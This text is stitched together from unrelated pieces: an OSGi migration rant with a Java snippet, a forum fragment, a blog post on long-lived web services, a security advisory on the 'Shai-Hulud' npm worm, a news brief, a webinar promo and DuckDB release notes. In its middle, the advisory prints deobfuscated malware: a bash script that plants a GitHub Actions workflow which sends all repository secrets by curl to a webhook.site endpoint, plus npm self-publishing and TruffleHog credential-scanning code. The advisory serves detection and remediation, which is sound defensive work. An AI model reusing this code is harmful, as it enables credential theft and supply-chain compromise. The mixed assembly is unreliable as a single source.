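import java.util.Map;
import java.util.ServiceLoader;

// Hypothetical plugin contract: the host only ever sees this interface,
// never the implementation classes.
interface JobRunnerPlugin {
    boolean canRun(String jobType);
    void run(String jobType, Map<String, String> parameters);
}

class PluginHost {
    public static void main(String[] args) {
        // Implementations list their class name in a
        // META-INF/services/<fully.qualified.JobRunnerPlugin> file and are
        // discovered at runtime, so the host never references them directly.
        ServiceLoader<JobRunnerPlugin> plugins = ServiceLoader.load(JobRunnerPlugin.class);
        for (JobRunnerPlugin plugin : plugins) {
            if (plugin.canRun("batch-report")) {
                plugin.run("batch-report", Map.of());
            }
        }
    }
}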
However, when dealing with existing code bases, this rarely maps well. The fact that modules become fully isolated is especially a bummer – it is so easy to take shortcuts with direct access to fields and methods that break encapsulation. After all, what is the harm when you control both the code being exposed and the code profiting from the lapse in encapsulation? Sadly, the answer is: the victim is modularity. Might as well do a single module/package in that case. And after ten years the JQM code was riddled with some of these shortcuts.
Lifecycle is also an issue in JQM. After all, JQM is a specialized sort of application server and has a complicated startup process to ensure that metadata is present and initialized if needed, that all plugins are loaded, etc. Introducing external control for parts of it is not trivial.
So… everything is fine: OSGi is actually only here to force us to clean up our act. That's factual, and actually a very good thing for the future maintainability of our code base. So why talk of pain?
Killing the patient
An unwilling patient
It is all well and dandy to ensure perfect modularity of one’s own code, but what happens when external libraries get involved? Mayhem.
First, stupid as it may seem, not all common libraries include an OSGi or JPMS manifest, so they can't be used directly by the OSGi framework. Not that many, thankfully, and in an OSS world PRs are always possible, but it is tiring, especially when you have to dabble inside unfamiliar build tooling (who the hell invented the torture named Gradle?). That's actually the easy part, as the PAX project has a dynamic encapsulation library (itself using the BND tool which, one way or another, will always find its way inside an OSGi project).
Second, all ‘big’ frameworks like JPA2, JAX-RS or JAXB implementations do black magic with class loading. That’s not their fault – they have to work in many different contexts with radically different class loading mechanisms (child first, parent first, as well as the dreaded TCCL – the thread context class loader) AND at the same time be modular themselves with mechanisms like late-binding or SPI/ServiceLoader. Sometimes, the black magic is actually inside the API and not inside the implementation (JAXB I’m looking at you), something a madman thought great on his worst day. Just throw a module restriction on class visibility and headaches ensue.
These class loading hacks are likely the worst item on the list. Actually, they are a consequence of the original sin of Java class loading, which was not made for modularity. (Funnily enough, this is so true that JPMS, the 'official Java' answer to OSGi, has chosen to avoid the issue entirely and not use class loader isolation between modules.) So OSGi is a hack trying to solve a fundamental issue, and like all hacks it works only in most cases and clashes with other hacks.
The most infuriating thing comes when OSGi tries to work around the issue with disasters like the
OSGi ServiceLoader Mediator specification
(also known as SPI Fly, its only implementation), which tries to set the TCCL dynamically with bytecode injection to allow SPI mechanisms to work… The specification is arid, the implementation documentation is a joke, and the result is lost nights wondering why the library only half loads, or trying to re-package external frameworks. There is a new attempt in OSGi R8 (no implementations yet) with
OSGi Connect
to ease communication between OSGi and normal Java – let’s wait for the bright future with a big grain of salt…
The only actually reasonable solution here is to forgo all magic configuration systems (implementation auto-discovery, declaration of classes to use in a configuration file…) and use in-code configuration when possible. When migrating a huge code base that relies on standards-compliant magic configuration, this switch is hard to justify cost-wise.
Dubious therapy
As a developer, I want only one build system. In our case, it's Maven. I'm not against plugging other build systems in (for example, an npm build of a JS module) as long as they are controlled by the main one. I certainly do not want a packaging system separate from the build system. Yet this is OSGi's assumed proposition – they want to separate the build path from the runtime path. (This, by the way, is a fundamental difference with JPMS and likely its only architectural advantage over OSGi.)
Well, I don’t want to have two competing dependency version resolvers. When I update a runtime or test dependency version, I want it to be updated inside the final distribution bundle too.
In the end we chose to still use Maven for packaging, with many hacks inside the packaging descriptor. The hacks are plays on scopes and dependency exclusions – the OSGi guys believe so much in their philosophy that they do not care at all about the transitive dependencies of their artifacts, going as far as leaving out non-OSGi sub-dependencies…
Missing information
The documentation is nothing short of a catastrophe – for the whole ecosystem. The main corpus is the OSGi specification (R7 at the time, R8 today). For a specification, it is really cool. But it is not made for users; it's meant for implementers of the specification. Yet the rest of the documentation is so poor that one is compelled to go back to it again and again. The different framework implementations (the big two being Apache Felix and Eclipse Equinox) hardly have any docs. There are a few websites/blogs (vogella, thank you!) with information that is very often outdated, as the framework has changed quite a bit since its inception in 1999. Very few Stack Overflow users. All in all, little information – OSGi is not a mainstream technology; it is mostly used behind the scenes inside foundation projects. Few users by nature, so few information contributors. The rest of the information will be found inside source code on GitHub, especially in the tests of the big OSGi frameworks or OSGi-using libraries.
The learning curve is more of a wall as a result. There was an attempt with
OSGi En-Route
to provide some startup templates, but even those… are buggy. It is always funny to clone a sample repository and find it just does not work. It was the right direction, though.
But still: when you have to understand why the modular HTTP service (the HTTP whiteboard, in OSGi terms) does not share context with your REST web service inside the same bundle, you do not expect to discover, inside a hard-to-find JIRA ticket, that there are multiple servlet contexts automatically created and that you have to create one manually and use LDAP filters to bind your elements to it. You would either expect clear documentation, or for it to work out of the box. Or you would expect yourself to burn everything with fire.
Another place of missing information is error messages. These are dreary. How could you guess that a NullPointerException inside SPI Fly means 'there is no JAR manifest'? Or quickly find, inside 5 lines of LDAP filters, the actual missing package on startup? This is likely the second most important point of this rant:
when things go wrong, OSGi makes it really hard to understand why
.
Testing
Tests using the actual OSGi mechanisms are complicated to create. There are multiple tools available, but really only one that works in a classic way for Java JUnit users: PAX Exam. It tries its best to run the tests inside an OSGi framework rather than in the class loader that started the test JVM. As we had hundreds of pre-existing JUnit tests, it was the only way for us to go.
This is another pain point associated with 'OSGi does not care about the build class path' – the JUnit tests 'see' the whole dependency tree in their class path. It will not be visible inside the OSGi bubble, but all it takes is a weirdly-set TCCL (thank you, CXF, for randomly changing it) for it to surface. Lovely exceptions ensue, like 'class X is not an instance of class X'. Setting up logging correctly is especially hard.
But overall, thanks to the PAX Exam coders. It is a great tool, and they even have some documentation! (even if Google will always send you to an older version)
Sad tales of basic malpractice
You know what? The JAXB-OSGI jar works perfectly in version 2.3.3. It stops working in version 2.3.4 with, like, no information at all. (You then learn that they have hard-coded – inside the API jar, not the implementation – a mechanism created years ago by the GlassFish team for service discovery; it is not documented anywhere, but yeah, sure, it's in the code…)
Partial bundles and dynamic imports: this is… an extension system for the extension system. Yahoo. Why they were created is understandable, but is it necessarily a good idea to force humans to read a jar manifest to understand what is going on?
LDAP filters to filter objects inside the OSGi registry: downright cruel.
The JAX-RS whiteboard only works with a very specific set of dependencies. Use the Karaf feature or lose hours debugging why your REST service does not start.
Theoretically, OSGi is a dependency resolver. Yet a specific bundle start order ('start levels') is still necessary for many things (the logger, framework extensions, …).
And to end on a funny note: Apache Felix itself relies on SPI/ServiceLoader in order to start. Makes you wonder why you would need anything more.
Regrets
All in all, we do not regret the work done. Well, 'done' is a matter of perspective, as that kind of refactoring is never actually finished, but the worst is behind us. The satisfaction is more about the clarity of the resulting code structure than about the framework itself, because the idea of breaking JQM by simply doing a minor library upgrade is not exactly what we dreamed of. OSGi is a bundle of hacks made by people who were both well-intentioned and great thinkers. It remains a hack, and it is a bit sad to see so much energy wasted on it.
As a final nail in the coffin, the OSGi Alliance has died, and the new Eclipse Foundation overlords of the specification have not yet made their plans clear. So we capitalized on the work done on OSGi to… implement JPMS instead, and removed all traces of OSGi. This will be the subject of a subsequent post, but we can already say: at least we do not regret this final decision.
Ask HN: Generalists, when do you say "I know enough" about any particular topic?
Or project-based? If you are a writer, for example, it's usually project based.
Otherwise, if you really have a hard time setting boundaries, then you might be the type to orient yourself around the states of your social circles. They definitely have boundaries when they stop listening or caring.
If you can't say enough is enough yourself, let someone you trust, or in whose competence you trust, do it for you.
I would say something like "when does it stop being useful" but the 'real' infinite game is all about curiosity and there's almost no players, just uninterested and destructive shareholders, so I'm gonna go with "do you have a thread that connects it all or not?" If you don't, and it only leads to more and more excursions, fix that point of depth where some subject still interfaces with the other stuff and stop there.
I normally skip presentations because I prefer reading, but Building the Hundred-Year Web Service (YouTube) was worth the time.
Note that despite
“htmx” featuring in the title, very little of the presentation is actually about
htmx.
It is about choosing and using technology in such a way that it won’t
require maintenance suddenly due to external factors changing. That’s a drum
I’ve been banging for the last few years too, although less visibly.
Petros observes that we know how to build bridges that last hundreds of years: stone, concrete, and steel can all do this with the right engineering. We also know how to build hypertext that is likely to last at least a few decades: use plain HTML and CSS. But, Petros asks, how do we create database-y web services that last for decades?
Where do we store the data? Where do we perform business logic? He answers thusly:
SQLite for data storage,
SQL queries for most of the application logic,
Express-on-Node.js for routing and presentation logic,
Jinja2 templates for additional presentation logic, and
HTML and vanilla JS for triggering HTTP requests.
I won’t debate the specifics here. I’d be tempted to jam Perl into the
backend instead of Node.js if I wanted truly low maintenance. I have a feeling a
Perl script is more likely to run unmodified 20 years from now than some Node.js
thing. But maybe I’m wrong on this.
But there were other nuggets in the
presentation. For example:
I’ve frequently wondered why I turn to the web browser when I want to make
cross-platform software. There’s a chart in the presentation that shows how
environmental churn and API deprecation lead desktop applications to have
an expected lifetime of maybe a decade, and phone apps closer to a couple of
years. On the other hand, simple web pages have worked unmodified for over 40
years! That’s a good reason to default to the web as a technology.
When a page load is fast enough, the browser does not do the whole
flicker-a-blank-page-before-doing-a-full-repaint, it just shows the new
content right away as a sort of partial update. This is apparently a recent
browser innovation, but it is what allows e.g.
Decision Drill
to do a full
page reload when a user interacts with it, and it still feels like one of them
smooth XMLHttpRequest things. Rest assured, it’s a full page reload.
But then the thing that triggered this article: SQLite. One of the more powerful arguments I’ve read against SQLite is that it has a few warts in its defaults, such as tables being flexibly typed, foreign keys not being enforced, primary keys being nullable, etc.
I’ve usually thought of these warts as a bad thing. Haskell has them too, like
how the built-in String type is a bad data structure for storing text, and how
we’re stuck with a bunch of misnamed functions (mapM, ap, msum, etc.) because we
didn’t know better. Oh and the list of Perl’s warts is probably longer than its
implementation.
Petros reframes this problem. Every single wart that annoys us today used to be
a reasonable feature that someone relied on in their production code. Every wart
we see today is a testament to the care the maintainers put into backward
compatibility. If we choose a technology today, we want one that saves us from
future maintenance by keeping our wartful code running – even if we don’t yet
know it is wartful. The best indicator of this is whether the technology has
warts today.
I would much rather, the first time I install an application, “enable foreign
keys” – it’s just one line of config – I’d rather do that once, build the thing
correctly, and then be confident that if there’s any other built-in behaviour
that I didn’t account for, that behaviour isn’t going to change on me and break
my application at some point in the future.
Right on.
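For concreteness, the one line of config in question is presumably SQLite's foreign-key pragma, and newer SQLite versions also offer an opt-out of flexible typing. A minimal sketch of both:

PRAGMA foreign_keys = ON;   -- enforcement is off by default; must be set per connection

-- Since SQLite 3.37, STRICT opts a table out of flexible typing:
CREATE TABLE users (
    id   INTEGER PRIMARY KEY,
    name TEXT NOT NULL
) STRICT;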
Self Propagating NPM Malware Compromises over 40 Packages
The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.
The incident was discovered by
@franky47
, who promptly notified the community through a
GitHub issue
.
In this post, we'll dive deep into the payload's mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation, targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.
Technical Analysis
The attack unfolds through a sophisticated multi-stage chain that leverages Node.js's process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.
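A package.json fragment of the shape described would look something like this (an illustrative reconstruction, not the actual compromised manifest):

{
  "name": "@ctrl/tinycolor",
  "version": "4.1.1",
  "scripts": {
    "postinstall": "node bundle.js"
  }
}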
Self-Propagation Engine
The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.
Credential Harvesting
The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.
For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. The malware specifically targets the following credentials:
The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub's /git/refs endpoint.
Data Exfiltration
The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named
Shai-Hulud
via the GitHub /user/repos API.
The entire attack design assumes Linux or macOS execution environments, checking that os.platform() returns 'linux' or 'darwin'; it deliberately skips Windows systems. The original report includes an attack flow diagram for a visual breakdown of the chain.
Attack Mechanism
The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but rather a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers.
The payload imports six core modules, each serving a specific function in the attack chain.
OS Recon (Module 71197)
This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.
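A rough reconstruction of what that profiling routine could look like (getSystemInfo and the field names come from the report; the exact shape of the code is assumed):

const os = require('os');

function getSystemInfo() {
  return {
    platform: os.platform(),     // e.g. 'linux' or 'darwin'
    arch: os.arch(),
    platformRaw: os.type(),
    archRaw: process.arch,
    env: { ...process.env },     // full environment dump, including any tokens present
  };
}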
Credential Harvesting Across Clouds
AWS (Module 56686)
The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.
The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.
GCP (Module 9897)
The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects/*/secrets/*. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.
Filesystem Secret Scanning (Module 94913)
This module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.
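A sketch of that invocation under the same assumptions (the exec command is quoted in the report; the parsing around it is conjecture):

const { exec } = require('child_process');

exec('trufflehog filesystem / --json', { maxBuffer: 64 * 1024 * 1024 }, (err, stdout) => {
  if (err) return;                        // fail silently, matching the malware's behavior
  for (const line of stdout.split('\n')) {
    if (!line) continue;
    try {
      const finding = JSON.parse(line);   // keep high-entropy findings (AWS keys, etc.)
      // ... collect finding for the exfiltration payload
    } catch {}
  }
});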
Propagation Mechanics
NPM Pivot (Module 40766)
The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.
// Deobfuscated NPM update snippet
async updatePackage(pkg) {
  // Patch package.json (add self as dep?) and publish
  await exec(`npm version patch --force && npm publish --access public --token ${token}`);
}
This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.
GitHub Backdoor (Module 82036)
The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941).
Here is the line-by-line bash script deconstruction:
# Deobfuscated code snippet
#!/bin/bash
GITHUB_TOKEN="$1"
BRANCH_NAME="shai-hulud"
FILE_NAME=".github/workflows/shai-hulud-workflow.yml"
FILE_CONTENT=$(cat <<'EOF'
on: push                      # Trigger on any push
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -d "$CONTENTS" https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7   # C2 exfil
          echo "$CONTENTS" | base64 -w 0 | base64 -w 0                                    # Double-base64 for evasion
        env:
          CONTENTS: ${{ toJSON(secrets) }}   # Dumps all repo secrets (GITHUB_TOKEN, AWS keys, etc.)
EOF
)

github_api() { curl -s -X "$1" -H "Authorization: token $GITHUB_TOKEN" ... "$API_BASE$2"; }

REPOS_RESPONSE=$(github_api GET "/user/repos?affiliation=owner,collaborator,organization_member&since=2025-01-01T00:00:00Z&per_page=100")

while IFS= read -r repo; do
  # Get default branch SHA
  REF_RESPONSE=$(github_api GET "/repos/$REPO_FULL_NAME/git/ref/heads/$DEFAULT_BRANCH")
  BASE_SHA=$(jq -r '.object.sha' <<< "$REF_RESPONSE")
  BRANCH_DATA=$(jq -n '{ref: "refs/heads/shai-hulud", sha: "$BASE_SHA"}')
  github_api POST "/repos/$REPO_FULL_NAME/git/refs" "$BRANCH_DATA"            # Handles "already exists" gracefully
  FILE_DATA=$(jq -n '{message: "Add workflow", content: "$(base64 <<< "$FILE_CONTENT")", branch: "shai-hulud"}')
  github_api PUT "/repos/$REPO_FULL_NAME/contents/$FILE_NAME" "$FILE_DATA"    # Overwrites if exists
done
This mechanism ensures persistence, as secrets are exfiltrated to the command and control server on the next push event.
Exfiltration
The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function
makeRepo('Shai-Hulud')
. The repository is public by default to ensure easy access for the command and control infrastructure.
The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate "security scan."
Indicators of Compromise
The following indicators can help identify systems affected by this attack:
GitHub Search Queries for Detection
Use these GitHub search queries to identify potentially compromised repositories across your organization:
Search for malicious workflow file
Replace ACME with your GitHub organization name and use the following GitHub search query to discover all instances of shai-hulud-workflow.yml in your GitHub environment.
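The query itself did not survive in this copy of the advisory; a plausible reconstruction using GitHub code search syntax would be:

org:ACME path:**/shai-hulud-workflow.yml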
To find malicious branches, you can use the following Bash script:
# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | while read repo; do
  gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'
done
File Hashes
The malicious bundle.js file has a SHA-256 hash of:
46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
Presence of malicious workflow file:
.github/workflows/shai-hulud-workflow.yml
Suspicious Function Calls
Calls to the NpmModule.updatePackage function
Suspicious API Calls
AWS API calls to secretsmanager.*.amazonaws.com endpoints, particularly BatchGetSecretValueCommand
GCP API calls to secretmanager.googleapis.com
NPM registry queries to registry.npmjs.org/v1/search
GitHub API calls to api.github.com/repos
Suspicious Process Executions
TruffleHog execution with arguments filesystem /
NPM publish commands with --force flag
Curl commands targeting webhook.site domains
Affected Packages
The following packages have been confirmed as compromised:
Package Name                                      Version(s)
@ctrl/tinycolor                                   4.1.1, 4.1.2
angulartics2                                      14.1.2
@ctrl/deluge                                      7.2.2
@ctrl/golang-template                             1.4.3
@ctrl/magnet-link                                 4.0.4
@ctrl/ngx-codemirror                              7.0.2
@ctrl/ngx-csv                                     6.0.2
@ctrl/ngx-emoji-mart                              9.2.2
@ctrl/ngx-rightclick                              4.0.2
@ctrl/qbittorrent                                 9.7.2
@ctrl/react-adsense                               2.0.2
@ctrl/shared-torrent                              6.3.2
@ctrl/torrent-file                                4.1.2
@ctrl/transmission                                7.3.1
@ctrl/ts-base32                                   4.0.2
encounter-playground                              0.0.5
json-rules-engine-simplified                      0.2.4, 0.2.1
koa2-swagger-ui                                   5.11.2, 5.11.1
@nativescript-community/gesturehandler            2.0.35
@nativescript-community/sentry                    4.6.43
@nativescript-community/text                      1.6.13
@nativescript-community/ui-collectionview         6.0.6
@nativescript-community/ui-drawer                 0.1.30
@nativescript-community/ui-image                  4.5.6
@nativescript-community/ui-material-bottomsheet   7.2.72
@nativescript-community/ui-material-core          7.2.76
@nativescript-community/ui-material-core-tabs     7.2.76
ngx-color                                         10.0.2
ngx-toastr                                        19.0.2
ngx-trend                                         8.0.1
react-complaint-image                             0.0.35
react-jsonschema-form-conditionals                0.3.21
react-jsonschema-form-extras                      1.0.4
rxnt-authentication                               0.0.6
rxnt-healthchecks-nestjs                          1.0.5
rxnt-kue                                          1.0.7
swc-plugin-component-annotate                     1.9.2
ts-gaussian                                       3.0.6
Immediate Actions Required
If you use any of the affected packages, take these actions immediately:
Identify and Remove Compromised Packages
# Check for affected packages in your project
npm ls @ctrl/tinycolor

# Remove compromised packages
npm uninstall @ctrl/tinycolor

# Search for the known malicious bundle.js by hash
find . -type f -name "*.js" -exec sha256sum {} \; | grep "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
Clean Infected Repositories
Remove Malicious GitHub Actions Workflow
# Check for and remove the backdoor workflow
rm -f .github/workflows/shai-hulud-workflow.yml

# Look for suspicious 'shai-hulud' branches in all repositories
git ls-remote --heads origin | grep shai-hulud

# Delete any malicious branches found
git push origin --delete shai-hulud
Rotate All Credentials Immediately
The malware harvests credentials from multiple sources. Rotate ALL of the following:
NPM tokens (automation and publish tokens)
GitHub personal access tokens
GitHub Actions secrets in all repositories
SSH keys used for Git operations
AWS IAM credentials, access keys, and session tokens
Google Cloud service account keys and OAuth tokens
Azure service principals and access tokens
Any credentials stored in AWS Secrets Manager or GCP Secret Manager
API keys found in environment variables
Database connection strings
Third-party service tokens
CI/CD pipeline secrets
Audit Cloud Infrastructure for Compromise
Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.
AWS Security Audit
Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.
# Check CloudTrail for suspicious secret access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue

# Review IAM credential reports for unusual activity
aws iam get-credential-report --query 'Content'
GCP Security Audit
For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.
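One way to pull those entries is with the standard gcloud CLI (an assumed example, not a command from the advisory; Data Access audit logs must be enabled for Secret Manager for these to appear):

# List recent audit log entries for Secret Manager access
gcloud logging read 'protoPayload.serviceName="secretmanager.googleapis.com"' --freshness=14d --limit=200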
Block outbound connections to webhook.site domains immediately
Monitor firewall logs for connections to https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
Implement Security Controls
GitHub Security Hardening
Review and remove unnecessary GitHub Apps and OAuth applications
Audit all repository webhooks for unauthorized additions
Check deploy keys and repository secrets for all projects
Enable branch protection rules to prevent force-pushes
Turn on GitHub Secret Scanning alerts
Enable Dependabot security updates
Ongoing Monitoring
Set up alerts for any new npm publishes from your organization
Monitor CloudTrail/GCP audit logs for secret access patterns
Implement regular credential rotation policies
Use separate, limited-scope tokens for CI/CD pipelines
For StepSecurity Enterprise Customers
The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14-day free trial by installing the StepSecurity GitHub App to complete the following recovery steps.
Use NPM Package Cooldown Check
The NPM Cooldown check
automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident:
Discover Pull Requests upgrading to compromised npm packages
We have added a new control specifically to detect pull requests that upgraded to these compromised packages. You can find the new control on the StepSecurity dashboard.
Use StepSecurity Harden-Runner to detect compromised dependencies in CI/CD
StepSecurity Harden-Runner adds runtime security monitoring to your GitHub Actions workflows, providing visibility into network calls, file system changes, and process executions during CI/CD runs. Harden-Runner detects these compromised packages when they are used in CI/CD. Here is a sample Harden-Runner insights page demonstrating this detection:
If you're already using Harden-Runner, we strongly recommend you review recent anomaly detections in your Harden-Runner dashboard. You can get started with Harden-Runner by following the guide at
https://docs.stepsecurity.io/harden-runner
.
Use StepSecurity Artifact Monitor to detect software releases outside of authorized pipelines
StepSecurity Artifact Monitor provides real-time detection of unauthorized package releases by continuously monitoring your artifacts across package registries. This tool would have flagged this incident by detecting that the compromised versions were published outside of the project's authorized CI/CD pipeline. The monitor tracks release patterns, verifies provenance, and alerts teams when packages are published through unusual channels or from unexpected locations. By implementing Artifact Monitor, organizations can catch supply chain compromises within minutes rather than hours or days, significantly reducing the window of exposure to malicious packages.
Senator Ron Wyden has asked the Federal Trade Commission to investigate Microsoft over its continued use of the RC4 encryption algorithm. The letter talks about a hacker technique called Kerberoasting, that exploits the Kerberos authentication system....
Senator Ron Wyden has
asked
the Federal Trade Commission to
investigate
Microsoft over its continued use of the RC4 encryption algorithm. The letter talks about a hacker technique called
Kerberoasting
, that exploits the Kerberos authentication system.
Webinar: Your browser is the breach — securing the modern web edge
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 12:01:08
The web browser has quietly become one of the most critical components of enterprise infrastructure—and one of the most dangerous. Join BleepingComputer, SC Media, and Push Security on September 29 at 12:00 PM ET for a live webinar on how attackers are targeting the browser to hijack sessions, steal...
The web browser has quietly become one of the most critical components of enterprise infrastructure—and one of the most dangerous.
On September 29th at 12:00 PM ET, BleepingComputer and SC Media will co-host a live webinar with browser security experts from
Push Security
, exploring how modern web browsers have become the primary attack surface for identity-based intrusions, SaaS abuse, and session hijacking.
The webinar "
Your Browser Is the Breach: Securing the Modern Web Edge
" will explore the evolving threat landscape targeting corporate browsers and reveal how attackers compromise accounts, steal data, and bypass traditional defenses—all from within the browser itself.
Push Security offers a real-time detection and response platform built for the browser, where identity attacks actually happen. Their technology gives security teams the visibility and control they need to detect risky behavior, protect SaaS sessions, and defend against credential compromise.
In this must-watch webinar, you'll learn how attackers are targeting browsers with malicious extensions, session token theft, OAuth abuse, and shadow extensions—alongside emerging threats like ClickFix and FileFix attacks—and what security teams can do to stop them.
Modern browsers now handle everything from authentication to sensitive SaaS data—and attackers have taken notice.
From phishing kits that harvest session tokens to stealthy extensions that evade detection, browser-based threats are growing rapidly. Traditional endpoint and identity tools often miss these attacks entirely, leaving dangerous gaps in enterprise defenses.
The upcoming webinar will cover:
How the browser became a high-value endpoint and attack surface
Common tactics for browser-based compromise, including extension abuse and session hijacking
Real-world strategies to detect malicious browser activity and close security control gaps
How to protect SaaS sessions and restore visibility at the web edge
The event will be hosted by Adrian Sanabria and browser security experts from Push Security.
Don't miss this opportunity to gain real-world insight into today's browser-based threats and learn how to take back control of your web edge.
TL;DR: We're releasing DuckDB version 1.4.0, codenamed “Andium”. This is an LTS release with one year of community support, and it packs several new features including database encryption, the MERGE statement and Iceberg writes.
We are proud to release DuckDB v1.4.0, named “Andium” after the
Andean teal
(Anas andium), which lives in the Andean highlands of Colombia, Venezuela and Ecuador.
In this blog post, we cover the most important updates for this release around support, features and extensions. DuckDB is moving rather quickly, and we could cover only a small fraction of the changes in this release. For the complete release notes, see the
release page on GitHub
.
To install the new version, please visit the
installation page
. Note that it can take a few days to release some client libraries (e.g., Go, R, Java) due to the extra changes and review rounds required.
We are delighted to see that DuckDB is used regularly in production environments and realize that such deployments often come with a requirement for long-term maintenance.
In the past, we would automatically deprecate old DuckDB versions whenever the newer version was released. But we’re changing this today.
Starting with this release, every
other
DuckDB version is going to be a Long Term Support (LTS) edition.
For LTS DuckDB versions,
community support
will last a year after the release (for now).
DuckDB Labs
is also starting to offer support for older LTS versions after their community support has expired.
Being able to encrypt DuckDB database files has been a
long-standing feature request
. Starting with this release, DuckDB supports encryption of its files. Encryption keys are given using the
ENCRYPTION_KEY
parameter
to
ATTACH
, like so:
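The code sample did not survive in this copy of the post; a minimal sketch of the syntax described (file name and key are illustrative):

ATTACH 'encrypted.db' AS enc_db (ENCRYPTION_KEY 'quack_quack_quack');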
DuckDB uses the industry-standard
AES encryption
with a key length of 256 bits using the recommended
GCM
mode by default.
The encryption covers the main database file, the write-ahead-log (WAL) file, and even temporary files. To encrypt data, DuckDB can use either the built-in
mbedtls
library or the OpenSSL library from the
httpfs
extension. Note that the OpenSSL versions are much faster due to hardware acceleration, so make sure to
LOAD httpfs
for good encryption performance.
DuckDB now supports
MERGE INTO
as an alternative to
INSERT INTO ... ON CONFLICT
.
MERGE INTO
does not require a primary key since it works on any custom merge condition. This is a very common statement in OLAP systems that do not support primary keys but still want to support upserting (i.e.,
UPDATE
plus
INSERT
) functionality.
In this example we use a simple condition matching on a key, and we use the RETURNING clause to get a summary of the updated and inserted rows.
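The sample itself is missing from this copy; a sketch of such a statement, with table and column names assumed:

MERGE INTO stock
USING new_arrivals
ON stock.item_id = new_arrivals.item_id
WHEN MATCHED THEN UPDATE SET qty = stock.qty + new_arrivals.qty
WHEN NOT MATCHED THEN INSERT VALUES (new_arrivals.item_id, new_arrivals.qty)
RETURNING merge_action, *;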
